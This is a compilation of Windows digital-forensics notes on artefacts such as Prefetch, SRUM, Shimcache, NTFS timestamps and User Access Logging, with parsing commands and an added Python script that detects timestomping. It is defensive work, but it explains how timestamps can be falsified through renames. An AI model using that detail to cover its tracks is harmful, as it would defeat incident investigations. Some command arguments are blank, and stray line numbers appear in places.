  read-only, etc.). The size and attributes are updated at each access to the
  target file (which induces an update of the `shortcut file`).

- the **target file's and the `shortcut file`'s** (source) own **`Modified,
  Access, and Created (MAC)` timestamps at the time of the last access to the
  target file**.

- whether the **target file was stored locally or on a remote network share**,
  through the presence of a `LocalPath` or a `NetworkPath`.

- occasionally **information on the volume that stored the target file**:
  drive type (fixed vs removable storage media), serial number, and label /
  name if any.

- occasionally **information on the host on which the shortcut file is
  present**: the system's NetBIOS hostname and MAC address.

The `source timestamps` stored in the `shortcut file`, as well as the
**`Creation` and `Modification` timestamps of the shortcut file itself**, will
also usually respectively indicate when the **target file was first and last
opened**.

### Parsing

Eric Zimmerman's `LECmd.exe` tool (`KAPE`'s `LECmd` module) can be used to
process `shortcut files`.

```
# Parses the specified shortcut file.
LECmd.exe [-q --csv ] -f

# Recursively retrieves and parses the shortcut files in the specified directory.
LECmd.exe [-q --csv ] -d \AppData\Roaming\Microsoft\Windows\Recent\ | C:\ | DIRECTORY>
```

--------------------------------------------------------------------------------

### References

https://www.youtube.com/watch?v=wu4-nREmzGM

https://forensicswiki.xyz/page/LNK

https://www.magnetforensics.com/blog/forensic-analysis-of-lnk-files/
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/MISC.md:
--------------------------------------------------------------------------------
# DFIR - Windows - MISC

**Windows DFIR notes are no longer maintained on InfoSec-Notes.
Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

### NTFS file attributes

A number of forensic artefact files, such as the `$MFT` or the `$UsnJrnl`
files, have both the `NTFS` `Hidden (H)` and `System (S)` attributes set. The
`System` attribute is used to identify system-critical files that are
"necessary for Windows to operate properly", which are not shown by the Windows
Explorer application or the `dir` utility by default.

Following a collection of these files, that may be locked by Windows and
require utilities such as `Velociraptor` or `KAPE` for triage, the copied files
will remain hidden. The `attrib.exe` utility can be used to remove the
`Hidden (H)` / `System (S)` attributes:

```
# Shows the NTFS attributes of the specified file, or of the files in the working directory.
attrib []

# Removes the Hidden and System attributes from the specified file.
attrib -h -s
```

Alternatively, hidden / system files can be displayed in the Windows Explorer
application (View -> Check "Hidden Items") or with the `dir` utility /
`Get-ChildItem` cmdlet if needed:

```
dir /x /a

# -Attributes Hidden,!Hidden lists hidden and non-hidden items alike (-Force is equivalent).
Get-ChildItem -Attributes Hidden,!Hidden
```
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/Outlook_files.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Qazeer/InfoSec-Notes/9340c61f285ec85e329b3bafdad724e0aa69e8f0/DFIR/Windows/Artefacts/Outlook_files.md
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/Prefetch.md:
--------------------------------------------------------------------------------
# DFIR - Windows - Prefetch artefacts

**Windows DFIR notes are no longer maintained on InfoSec-Notes.
Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

### Overview

Location: `%systemroot%\Prefetch\-.pf`
Filename example: `POWERSHELL.EXE-022A1004.pf`

Yields information related to **programs execution**.

**Not present by default on Windows Server operating systems.**

`Windows Prefetch` is a performance enhancement feature that enables
prefetching of applications to make system boots or application startups
faster. `Prefetch` files are created whenever a program is executed from a
specific path. If the same binary is executed from different locations,
separate `Prefetch` files will be created for each location.
A `Prefetch` file can be created even if the executable did not successfully
run.

Whether the `Prefetch` feature is enabled is configured by the
`EnablePrefetcher` registry value (under
`HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters`):
- `0` / undefined: disabled (default on Windows Server operating systems).
- `0x1`: partially enabled (application prefetching only).
- `0x2`: partially enabled (boot prefetching only).
- `0x3`: enabled (application and boot prefetching).

### Information of interest

`Prefetch` files are not automatically deleted if the related executable is
deleted and can thus be a source of historical information. However, as the
`Prefetch` directory is limited to 128 entries on `Windows XP` to `Windows 7`
and to 1024 entries starting from `Windows 8`, `Prefetch` files may be
overwritten and information lost.

The `Prefetch` filenames are based on the executed program name and a hash,
computed using a proprietary algorithm and based on the full path (and,
for some binaries, such as `dllhost.exe` or `svchost.exe`, the command line
parameters) of the executed program.

The `Prefetch` files can yield the following information of forensic interest:
- The file name and size of the executed binary.
- The last execution timestamp and, starting from Windows 8, the last eight
  execution timestamps.
- The `Prefetch` file's own `NTFS` creation and last modification timestamps,
  which respectively indicate the first and last time the program was
  executed (the file is written about ten seconds after the execution
  starts).
- The run count (number of times the binary was executed).
- The list of files and directories accessed during the first ten seconds of
  execution (including the eventual `DLLs` loaded).
  The full path to the executable can often be determined from the list of
  files accessed (duplicates are possible if a given binary accesses another
  binary with the same name).

Note that `Prefetch` files can easily be deleted, potentially invalidating
the trace of execution and timestamps (notably of first execution).

*Prefetch files indirect information*

The creation or modification of `Prefetch` files observed in other artefacts
(`$MFT`, `UsnJrnl`, etc.) reflects an execution of the binary linked to the
`Prefetch` file (whose name can be deduced from the `Prefetch` filename).

*Prefetch information related to PowerShell execution*

The `POWERSHELL.EXE-[...].pf` `Prefetch` file may contain references to
recently executed PowerShell scripts. For an entry to be created in the
`Prefetch` file, the given script must be accessed within the first ten seconds
of the `powershell.exe` execution.

The accessed files list retains entries from previous instances of a program
execution. Accessed files information may thus persist through subsequent
`powershell.exe` runs.

### Parsing

Eric Zimmerman's `PECmd.exe` tool (`KAPE`'s `PECmd` module) can be used to
parse `Prefetch` file(s):

```
# Parses the specified Prefetch file.
PECmd.exe [-q --csv ] -f

# Recursively retrieves and parses the Prefetch files in the specified directory.
PECmd.exe [-q --csv ] -d
```
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/RecentFilecache.md:
--------------------------------------------------------------------------------
### RecentFilecache

**Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

Location: `%systemroot%\AppCompat\Programs\RecentFileCache.bcf`

Only present on Windows 7 and Windows Server 2008 R2.
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/RecycleBin.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Qazeer/InfoSec-Notes/9340c61f285ec85e329b3bafdad724e0aa69e8f0/DFIR/Windows/Artefacts/RecycleBin.md
--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/SRUM.md:
--------------------------------------------------------------------------------
# DFIR - Windows - System Resource Usage Monitor (SRUM)

**Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

### Overview

Introduced in Windows 8.

Location:

- `SRUM` database: `%SystemRoot%\System32\SRU\SRUDB.dat`.

- (Optional) `SOFTWARE` (`%SystemRoot%\System32\config\SOFTWARE`) registry
  hive to translate some information in the database (user `SID` to username
  and network interfaces information notably).

Yields information related to the system usage, including **programs
execution** and **executed programs' network usage**. **Historical data only
for the last 30 to 60 days** is stored in the `SRUM` database.
20 | 21 | Entries are not associated with their timestamp of occurrence but with the 22 | timestamp of insertion in the `SRUM` database. As entries are only written to 23 | the `SRUM` database every hour, timestamps are thus precise to the hour (with 24 | multiple entries usually sharing the same insertion timestamp). 25 | 26 | The `System Resource Usage Monitor (SRUM)` is a feature that records numerous 27 | metrics of system activities. Among the various information stored, the 28 | following two tables hold the most commonly valuable data for forensics 29 | investigations: 30 | 31 | - `Application Resource Usage` table (GUID 32 | `{D10CA2FE-6FCF-4F6D-848E-B2E99266FA89}`), that tracks programs 33 | execution. 34 | For each entry in the `Application Resource Usage` table (`SrumECmd`'s 35 | `AppResourceUseInfo` output), the following information may be recorded: 36 | - Timestamp of the `SRUM` entry creation. 37 | - Full path of the executable or application information / description for 38 | built-in components. 39 | - User `SID` of the user executing the process. 40 | - Metrics on CPU usage (CPU time in foreground and background). 41 | - Metrics on I/O operations (foreground / background number of read / write 42 | operations and bytes read / written). 43 | 44 | - `App Timeline Provider` table (GUID 45 | `{5C8CF1C7-7257-4F13-B223-970EF5939312}`), that also tracks programs 46 | execution. 47 | For each entry in the `Application Resource Usage` table (`SrumECmd`'s 48 | `AppTimelineProvider` output), the following information may be recorded: 49 | - Timestamp of the `SRUM` entry creation. 50 | - Name of the executable and description for built-in components. 51 | - Timestamp of compilation of the executable. 52 | - User `SID` of the user executing the process. 53 | - Timestamp of seemingly approximate end of execution. 54 | - Total duration of execution (in milliseconds). 
55 | 56 | - `Network Data Usage` table (GUID `{973F5D5C-1D90-4944-BE8E-24B94231A174}`), 57 | that tracks programs execution and network usage of the executed 58 | programs. 59 | For each entry in the `Network Data Usage` table (`SrumECmd`'s 60 | `NetworkUsages` output), the following information may be 61 | recorded: 62 | - Timestamp of the `SRUM` entry creation. 63 | - Full path of the executable or application information / description for 64 | built-in components. 65 | - Metrics on network data usage (bytes sent and receive on a given network 66 | interface). 67 | 68 | Some of the information recorded in the `SRUM` database be viewed using the 69 | Windows `Task Manager` ("App history" tab). 70 | 71 | More information on the tables in the `SRUM` database is referenced in the 72 | [`srum-dump`](https://github.com/MarkBaggett/srum-dump) project's 73 | [mapping file](https://github.com/MarkBaggett/srum-dump/blob/master/SRUM_TEMPLATE2.xlsx). 74 | 75 | ### Parsing 76 | 77 | ###### Repairing the SRUDB.dat database 78 | 79 | As the copied `SRUM` database will likely not be in a "clean state", the 80 | database will have to be repaired. This can be accomplished using the 81 | `esentutl` utility. It is recommended to make a copy of the `SRU` directory 82 | before repairing the database. 83 | 84 | ``` 85 | # The following commands should be executed in the directory containing the UAL database files. 86 | 87 | esentutl.exe /r sru /i 88 | 89 | esentutl.exe /p SRUDB.dat 90 | ``` 91 | 92 | ###### SrumECmd 93 | 94 | The `SrumECmd` utility (`KAPE`'s `SrumECmd` module) can parse and extract 95 | information from the `SRUDB.dat` database, and correlates information from the 96 | `SOFTWARE` registry hive. 97 | 98 | ``` 99 | # Parses the specified SRUM database, using the optionally provided SOFTWARE registry hive. 100 | SrumECmd.exe -f [-r ] --csv 101 | 102 | # Recursively look for SRUDB.dat and SOFTWARE files in the specified directory. 
103 | SrumECmd.exe -d --csv 104 | ``` 105 | 106 | -------------------------------------------------------------------------------- 107 | 108 | ### References 109 | 110 | https://isc.sans.edu/forums/diary/System+Resource+Utilization+Monitor/21927/ 111 | 112 | https://www.youtube.com/watch?v=Uw8n4_o-ETM 113 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/Shimcache.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - Application Compatibility Cache (Shimcache) 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | - Files:
8 | `%WinDir%\System32\config\SYSTEM` 9 | 10 | - Registry keys: 11 | 12 | - `>= Windows Server 2003` and `Windows XP 64-bit`
13 | `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache` 14 | 15 | - `Windows XP 32-bit`
16 | `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatibility\AppCompatCache` 17 | 18 | Yield information related to **programs execution**, for Windows operating 19 | systems before the Windows 10 / Windows Server 2016 operating systems. 20 | 21 | The `Application Compatibility Cache`, also known as `Shimcache`, was 22 | introduced in `Windows XP` as part of the `Application Compatibility 23 | Infrastructure (Shim Infrastructure)` feature. The `Shim Infrastructure` is 24 | designed to identify application compatibility issues and maintain support of 25 | existing software to new versions of the `Windows` operating system. As stated 26 | in the Microsoft documentation, the `Shim Infrastructure` "implements a form of 27 | application programming interface (API) hooking" in order to redirect API calls 28 | made by an application to an alternative library containing stub functions, 29 | known as the `Shim`. The process of making an application compatible to a new 30 | version of Windows through `Shims` is referred to as "`shimming`". 31 | 32 | As a part of this framework, the `Application Compatibility Database` 33 | references the applications that have known `shimming` solutions. Upon 34 | execution of an application, the `Shim Engine` will query this database to 35 | determine whether the applications require `shimming`. The `Shimcache` contains 36 | metadata about the files that have been subject to such lookup, for 37 | optimizing and improve the speed of eventual later lookups. 38 | 39 | A `Shimcache` entry is created whenever a program is executed from a specific 40 | path. However, starting from the `Windows Vista` and `Windows Server 2008` 41 | operating systems, entries may also be created for files in a directory that is 42 | accessed interactively. 
Indeed, browsing a directory using `explorer.exe` will generate `Shimcache`
entries for the executables stored within the directory (if the executable was
visible in the `Windows Explorer` window).

**`Shimcache` entries are only written to the registry upon shutdown or reboot
of the system. The `Shimcache` entries generated since the last system boot
are thus only stored in memory.**

While a `Shimcache` entry is not removed upon deletion of the associated file,
`Shimcache` entries may be overwritten and information lost as the oldest
entries are replaced by new data. A maximum of 96 `Shimcache` entries can be
stored on `Windows XP` / `Windows Server 2003`, and up to 1024 entries starting
from the `Windows Vista` and `Windows Server 2008` operating systems.

### Information of interest

Each `Shimcache` entry contains the following information, varying depending
on the version of the Windows operating system in use:

- The associated **file full path**.

- On `Windows 2003 and XP 64-bit` and older, **the file size**.

- The **`LastModifiedTime` (`$STANDARD_INFORMATION`) timestamp of the file**,
  which **does not necessarily reflect the execution time**. Indeed,
  `Shimcache` entries are not directly associated with an insertion /
  execution timestamp.

- The cache entry position, as a numerical value starting from 0, which
  represents the insertion position in the `Shimcache`.
  **The lower the value, the more recently the program was shimmed.**

- From `Windows Vista` / `Windows Server 2008` up to `Windows 8.1` /
  `Windows Server 2012 R2`, the (undocumented) `Insert Flag` which, when
  set, seems to indicate that the entry was executed.
  **This flag is no longer present starting from Windows 10 / Windows Server
  2016, and thus a `Shimcache` entry does not necessarily reflect an
  execution** (as entries may also be created for files in a directory that
  is accessed interactively).

- On `Windows XP 32-bit`, the file `Last Update Time` timestamp.

### Parsing

###### Entries stored on disk

Eric Zimmerman's `AppCompatCacheParser.exe` tool (`KAPE`'s
`AppCompatCacheParser` module) and the `ShimCacheParser.py` Python script
can be used to parse `Shimcache` entries.

By default, both tools will parse all the `ControlSet` found in the `SYSTEM`
hive.

```
# Parses the live system Registry.
AppCompatCacheParser.exe --csv <OUTPUT_DIRECTORY>
python ShimCacheParser.py --local -o <OUTPUT_FILE>

# Parses the specified SYSTEM hive.
# --nl: option to force the parsing of the hive even if the hive is in a "dirty" state and no transaction logs are available.
AppCompatCacheParser.exe [--nl] -f <SYSTEM_HIVE> --csv <OUTPUT_DIRECTORY>

python ShimCacheParser.py [--hive <SYSTEM_HIVE> | --reg <EXPORTED_REG_FILE>] -o <OUTPUT_FILE>
```

###### Entries only present in memory

The `Volatility2`'s `shimcache` plugin can be used to extract the `Shimcache`
entries living in memory (generated since the last system boot).

For more information on how to capture memory and use `Volatility` for memory
analysis, refer to the `[DFIR] Memory` note.

```
vol.py -f win7.vmem --profile=Win7SP1x86 shimcache
```

--------------------------------------------------------------------------------

### References

https://www.fireeye.com/content/dam/fireeye-www/services/freeware/shimcache-whitepaper.pdf
https://www.fireeye.com/blog/threat-research/2015/06/caching_out_the_val.html
http://www.alex-ionescu.com/?p=39
https://docs.microsoft.com/en-us/windows/win32/devnotes/application-compatibility-database
https://lifars.com/wp-content/uploads/2017/03/Technical_tool_Amcache_Shimcache.pdf
https://github.com/mandiant/ShimCacheParser

--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/Timestamps.md:
--------------------------------------------------------------------------------

# DFIR - Windows timestamps

### NTFS $STANDARD_INFORMATION & $FILENAME MACB timestamps

On `NTFS` filesystems, each file possesses (at least) two attributes that hold
(among other information) `Modification, Access, Change and Birth (MACB)`
timestamps:
- `$STANDARD_INFORMATION`
- `$FILENAME`

The impact of a number of operations on each timestamp of the
`$STANDARD_INFORMATION` and `$FILENAME` attributes is detailed in the
[SANS's `Windows Time Rules` poster](https://www.sans.org/security-resources/posters/windows-forensic-analysis/170/download).
Globally, the following points should be noted:

- `$FILENAME` `MACB` timestamps are updated on file creation / copy / volume
  move with the date of the operation itself but are not reliably updated
  on regular file operations (access, modification, rename, deletion).
  **However, as the `$FILENAME` `MAB` timestamps are copied from the
  `$STANDARD_INFORMATION` `MAB` timestamps on file rename or volume-local
  file move, they are prone to false negatives.** Indeed, by timestomping the
  `$STANDARD_INFORMATION` timestamps then renaming or moving the file, the
  `$FILENAME` timestamps will be indirectly timestomped as well.

- On file copy (between two `NTFS` partitions): the `$STANDARD_INFORMATION`
  `MC` timestamps are inherited from the original file but the
  `$STANDARD_INFORMATION` `AB` timestamps (and the `$FILENAME` `MACB`
  timestamps) are the ones of the copy itself.

- On local file moves (on the same `NTFS` partition), the
  `$STANDARD_INFORMATION` `C` and `$FILENAME` `C` timestamps are updated with
  the timestamp of the move. On file moves between `NTFS` partitions, the
  `$STANDARD_INFORMATION` `AC` timestamps are updated, also with the
  timestamp of the move.

- The update of the `$STANDARD_INFORMATION` `A` timestamp is unreliable and
  depends on the value of the
  `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate`
  registry value. The following values may be encountered:

  - `0` (default on Windows XP), `80000000` (User managed), `80000002`
    (System managed) mean that last access updates are enabled. Starting
    from `Windows 10 Redstone 4` (version 1803 of 04/2018), last access
    updates seem to be enabled (back) by default if the system partition
    size is <= 128 GiB. Starting from `Windows 10 20H1` (Insider build 18970,
    released as version 2004 in 05/2020), last access updates seem to be
    enabled by default independently of the system partition size.

  - `1` (default from Windows Vista to early Windows 10 versions),
    `80000001` (User managed), `80000003` (System managed) mean that last
    access updates are disabled.
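The following Python script is an added example, not part of the original
notes, showing how the `FILETIME` values held in `$STANDARD_INFORMATION` and
`$FILE_NAME` are decoded (the 100-nanosecond-intervals-since-1601 format that
`w32tm /ntte` converts) and how the `$SI` / `$FN` discrepancies discussed above
are turned into a timestomping check. The attribute bodies are constructed by
the script (`build_standard_information`, `build_file_name`) rather than read
from a real `$MFT`, and the two heuristics (`$SI` creation older than `$FN`
creation, whole-second `$SI` values) are assumptions of this example: they
catch tools that set `$SI` through the documented API, not an adversary that
also laundered `$FN` through the rename trick described above.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
FILETIME_PER_SECOND = 10_000_000  # FILETIME ticks are 100 ns


def filetime_to_datetime(filetime):
    """FILETIME: number of 100 ns intervals since 1601-01-01 00:00:00 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(value):
    delta = value - FILETIME_EPOCH
    return (delta.days * 86_400 * 1_000_000 + delta.seconds * 1_000_000
            + delta.microseconds) * 10


def parse_standard_information(body):
    """$STANDARD_INFORMATION body: creation (B), modification (M),
    MFT-entry modification (C) and access (A) FILETIMEs at 0x00..0x18."""
    raw = dict(zip("BMCA", struct.unpack_from("<4Q", body, 0x00)))
    return {"raw": raw, **{k: filetime_to_datetime(v) for k, v in raw.items()}}


def parse_file_name(body):
    """$FILE_NAME body: parent MFT reference (0x00), the same four FILETIMEs
    at 0x08..0x28, sizes and flags, then name length (0x40), namespace (0x41)
    and the UTF-16LE name (0x42)."""
    raw = dict(zip("BMCA", struct.unpack_from("<4Q", body, 0x08)))
    name_len = body[0x40]
    name = body[0x42:0x42 + 2 * name_len].decode("utf-16-le")
    return {"raw": raw, "name": name,
            **{k: filetime_to_datetime(v) for k, v in raw.items()}}


def timestomp_indicators(si, fn):
    """Heuristics (assumed by this example): $SI is settable through the
    documented API while $FN is not, so $SI older than $FN, or whole-second
    $SI values (what timestomping tools typically write), are suspicious."""
    findings = []
    if si["B"] < fn["B"]:
        findings.append("$SI creation predates $FN creation")
    if all(v % FILETIME_PER_SECOND == 0 for v in si["raw"].values()):
        findings.append("all $SI timestamps have zero sub-second precision")
    return findings


# Builders for the constructed sample attributes (not real disk data).
def build_standard_information(b, m, c, a):
    return struct.pack("<4Q", b, m, c, a) + bytes(16)


def build_file_name(name, b, m, c, a, parent_ref=5):
    header = struct.pack("<Q4QQQII", parent_ref, b, m, c, a, 0, 0, 0, 0)
    return header + bytes([len(name), 3]) + name.encode("utf-16-le")


GENUINE = datetime_to_filetime(datetime(2022, 3, 10, 12, 0, 0, 123456, tzinfo=timezone.utc))
STOMPED = datetime_to_filetime(datetime(2015, 1, 1, tzinfo=timezone.utc))

SAMPLE_FN = build_file_name("evil.exe", GENUINE, GENUINE, GENUINE, GENUINE)
CLEAN_SI = build_standard_information(GENUINE, GENUINE + 7, GENUINE + 7, GENUINE)
STOMPED_SI = build_standard_information(STOMPED, STOMPED, STOMPED, STOMPED)


def check(si_body, fn_body):
    return timestomp_indicators(parse_standard_information(si_body),
                                parse_file_name(fn_body))


if __name__ == "__main__":
    for label, body in (("clean", CLEAN_SI), ("stomped", STOMPED_SI)):
        print(label, parse_file_name(SAMPLE_FN)["name"], check(body, SAMPLE_FN))
```

Run stand-alone, the script reports nothing for the clean record and both
indicators for the record whose `$SI` timestamps were pushed back to 2015 with
whole-second precision; on real data, feed it the attribute bodies extracted
from an `$MFT` record.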
Depending on its filename length, a given file may have one or two `$FILENAME`
attributes:

- A file with a short name will have a single `$FILENAME` attribute.

- A file with a long name will be associated with two `$FILENAME` attributes,
  one for the long file name and a second for the MS-DOS-compatible short
  file name (`FILENA~1.TXT` for example).

Additionally, another `$FILENAME` attribute can be found for each file in the
directory index of its parent directory. Indeed, directories are stored on
`NTFS` partitions as `B+ tree` data structures with the keys, representing
files and subdirectories, stored as `$FILENAME` attributes. `MACB` timestamps
for each file and subdirectory of a given directory can thus be found in the
directory index. The directory indexes are stored in `NTFS` index attributes,
also known as `INDX` records and named `$I30` on disk.

A given file may thus be associated with either:

- **12 timestamps**: `$STANDARD_INFORMATION` + `$FILENAME` + `NTFS $I30`'s
  `$FILENAME`.

- **20 timestamps**: `$STANDARD_INFORMATION` + 2 * `$FILENAME` +
  2 * `NTFS $I30`'s `$FILENAME` (duplicate timestamps for files with a long
  name).

### Registry last write timestamps

The last write / modified timestamp of a registry key corresponds to the last
time a write operation occurred on the key. Multiple types of write operations
may trigger an update of the last write / modified timestamp of the key:

- Addition / modification / deletion of one (or multiple) values under the
  key.

- Addition / deletion of a sub-key under the key.

- Change in the security descriptor (including `Access Control List (ACL)`)
  of the key.

The last write / modified timestamp of a registry key is the only generic
timestamp available regarding registry keys (registry values carry no
timestamp of their own).

### Convert Windows FILETIME to human readable format

Timestamps in Windows are most often stored as `FILETIME` values: 64-bit
integers counting the number of 100-nanosecond intervals elapsed since
1601-01-01 00:00:00 UTC (the "NT time epoch"). This is the format found in
`NTFS` attributes, the registry, event logs and Active Directory time
attributes (`lastLogon`, `pwdLastSet`, etc.). It should not be confused with
the `UNIX time` format (number of seconds elapsed since 1970-01-01), which is
less common on Windows.

Note that Active Directory generally stores time values of objects (stored in
each object's attributes) in `UTC` (`Greenwich Mean Time (GMT)`), so a
conversion to the local time zone may be needed.

The following one-liner can be used to convert a `FILETIME` value to a human
readable format:

```
# Displays both the time in UTC and in the local time zone of the system.
w32tm.exe /ntte <FILETIME>

# Example: 132913872000000000 corresponds to 2022-03-10 12:00:00 UTC.
```

--------------------------------------------------------------------------------

### References

https://www.sans.org/security-resources/posters/windows-forensic-analysis/170/download

https://forensicswiki.xyz/wiki/index.php?title=MAC_times

https://dfir.ru/2018/12/08/the-last-access-updates-are-almost-back/amp/

--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/User_Access_Logging.md:
--------------------------------------------------------------------------------

# DFIR - Windows - User Access Logging artefacts

### Overview

Location: `%SystemRoot%\System32\Logfiles\SUM\` folder.

Yields information related to **user access and activity**.
On Domain Controllers, yields information on **sessions opened on domain-joined
computers** (if the given DC was reached for authentication / `Group Policy`
retrieval).

`User Access Logging (UAL)` is a feature introduced, and enabled by default, in
`Windows Server 2012` that consolidates data on client activity. Among other
information, user access to specific Windows Server roles (such as
`Active Directory Domain Services` on Domain Controllers) is logged by the
`UAL`. The specific activity triggering an entry to be logged for a given role
is not documented.

The information is stored locally in up to five
`Extensible Storage Engine (ESE)` database files (`.mdb`):
- `Current.mdb`, which contains data for the last 24 hours.
- Up to three `.mdb` files (named after a `GUID`), which each contain data for
  an entire year (first to last day), going back 2 years. The data in the
  `Current.mdb` database is copied each day to the (`.mdb`) database of the
  current year.
- `SystemIdentity.mdb`, which contains metadata on the local server, including
  a mapping between roles' GUIDs and names.

Historical data going back 2 years (2020 as of 2022) may thus be retrieved
from the `UAL` database files.

### Information of interest

The `CLIENTS` table of the aforementioned database files contains multiple
pieces of information of interest:
- Accessed Windows Server role `GUID` and description. Among others, the
  following roles can be encountered:
  - `Active Directory Domain Services` (GU
    `ad495fc3-0eaa-413d-ba7d-8b13fa7ec598`).
  - `File Server` (GUID: `10a9226f-50ee-49d8-a393-9a501d47ce04`).
  - `Active Directory Certificate Services` (GUID:
    `c50fcc83-bc8d-4df5-8a3d-89d7f80f074b`).

- The client domain and username.

- Total number of accesses.

- First, last, and daily access timestamps.

- Client `IPv4` or `IPv6` address. On Domain Controllers, the hostname
  associated with the `IP` address at that time may be retrievable as machine
  accounts of domain-joined computers also authenticate to `AD DS`.

Each entry in the `CLIENTS` table is composed of a unique combination of a
Windows Server role, a client's domain / username, and a source `IP` address.

The `DNS` table of the aforementioned database files contains information
about `DNS` resolutions: hostname, associated `IP` address, and timestamp of
last resolution.

### Parsing

###### Live forensics

The PowerShell cmdlets of the `UserAccessLogging` module can be used to
retrieve `UAL` data on a live system:

```powershell
# Enumerates the roles installed on the system.
Get-UalOverview

# Retrieves UAL data for user access (data stored in the CLIENTS table).
Get-UalUserAccess

# Retrieves UAL data for client access by device for a given service, ordered by date (data stored in the CLIENTS table).
# The cmdlet returns the date that the client accessed the service and how many times the client accessed the service during that day.
Get-UalDailyAccess

# Retrieves information on DNS resolutions (data stored in the DNS table).
Get-UalDns
```

###### Triaged UAL database files

A direct copy of the `UAL` database files is not possible as the files are
locked due to continuous access. The files should be copied through a
`shadow copy` volume or using utilities implementing raw disk reads (such as
[`Velociraptor`](https://github.com/Velocidex/velociraptor) or
[`RawCopy`](https://github.com/jschicht/RawCopy)).

```bash
# Example of low level file copy bypassing file locking using RawCopy.
RawCopy64.exe /FileNamePath:"<FILE_PATH>" /OutputPath:"<OUTPUT_DIRECTORY>"
```

As the databases copied will not be in a "clean state", the database files will
have to be repaired. This can be accomplished using the `esentutl` utility
(the `UAL` transaction logs use the `Svc` base name, hence `/r svc`):

```
# The following commands should be executed in the directory containing the UAL database files.

esentutl.exe /r svc /i

esentutl.exe /p <MDB_FILE>
```

Eric Zimmerman's `SumECmd.exe` tool or
the [`KStrike`](https://github.com/brimorlabs/KStrike) Python script can be
used to parse `UAL` database files:

```bash
# Parses the specified individual UAL database file.
KStrike.py <MDB_FILE>

# Parses the UAL database files (Current.mdb, SystemIdentity.mdb, etc.) in the specified directory.
# The results will be aggregated in single CSV files per category (client access, DNS requests, etc.).
SumECmd.exe --csv <OUTPUT_DIRECTORY> -d <UAL_DIRECTORY>
```

--------------------------------------------------------------------------------

### References

https://advisory.kpmg.us/blog/2021/digital-forensics-incident-response.html

https://www.youtube.com/watch?v=rVHKXUXhhWA

https://docs.microsoft.com/en-us/windows-server/administration/user-access-logging/get-started-with-user-access-logging

https://www.crowdstrike.com/blog/user-access-logging-ual-overview/

--------------------------------------------------------------------------------
/DFIR/Windows/Artefacts/UsnJrnl.md:
--------------------------------------------------------------------------------

# DFIR - Windows - $UsnJrnl

### Overview

The `Update Sequence Number (USN) Journal` is a feature of `NTFS`, activated by
default on Windows Vista and later, which maintains a record of changes made
to the `NTFS` volume. The creation, deletion or modification of files or
directories are for instance journalized.

Similarly to the `MFT`, entries for deleted files are progressively overwritten
in the `UsnJrnl`.

The journal is located in `\$Extend\$UsnJrnl` but can not be accessed through
the Windows Explorer as it is a system file. It is composed of the `$Max` and
`$J` alternate data streams: the `$Max` data stream stores the metadata of the
journal (maximum size, allocation delta, journal ID) and the `$J` data stream
stores the actual change log records.

The change log records are notably composed of:
- an `Update Sequence Number (USN)`
- the timestamp of the change
- the file name
- the reason the record was logged (`USN_REASON_FILE_CREATE`,
  `USN_REASON_FILE_DELETE`, `USN_REASON_DATA_OVERWRITE`,
  `USN_REASON_RENAME_NEW_NAME`, etc.)
- the `MFT` reference (and sequence number) of the file and of its parent
  directory

### UsnJrnl metadata

The Windows `fsutil` utility and the PowerShell cmdlet
`Get-ForensicUsnJrnlInformation` of the `PowerForensics` suite can be used to
retrieve metadata about the `UsnJrnl`:

```
# First and current USN, maximum size notably.
fsutil usn queryjournal <VOLUME>

Get-ForensicUsnJrnlInformation
Get-ForensicUsnJrnlInformation -VolumeName <VOLUME>
Get-ForensicUsnJrnlInformation -Path <PATH>
```

### UsnJrnl extraction and parsing

###### MFTECmd

The `MFTECmd` utility can parse and extract information from the
`UsnJrnl`'s `$J` stream (as well as other filesystem artefacts such as the
`$MFT`, the file ownership `$Secure:$SDS` data stream, and the transaction log
file `$LogFile`).

```bash
# A UsnJrnl's $J file on a mounted partition should be specified.
# For instance, to extract UsnJrnl's $J data from a forensics image, the image should first be mounted and the UsnJrnl's $J stream specified as <MOUNT_DRIVE>:\$Extend\$UsnJrnl:$J to MFTECmd.exe (or the $J file extracted by a triage tool such as KAPE).

MFTECmd.exe -f '<USNJRNL_J_FILE>' --csv <OUTPUT_DIRECTORY>
```

###### ExtractUsnJrnl / UsnJrnl2Csv

The `ExtractUsnJrnl.exe` and `UsnJrnl2Csv.exe` utilities as well as the
PowerShell cmdlet `Get-ForensicUsnJrnl` of the `PowerForensics` suite can be
used to parse and extract information from the `UsnJrnl`. The tools below do
not support the `UsnJrnl`'s `USN_RECORD_V4` format yet.

```
ExtractUsnJrnl64.exe /DevicePath:<DEVICE_PATH> [/OutputPath:<OUTPUT_DIRECTORY> | /OutputName:<OUTPUT_FILE>]
ExtractUsnJrnl64.exe /ImageFile:<IMAGE_FILE> [/OutputPath:<OUTPUT_DIRECTORY> | /OutputName:<OUTPUT_FILE>]

# Starts the UsnJrnl2Csv GUI.
UsnJrnl2Csv64.exe
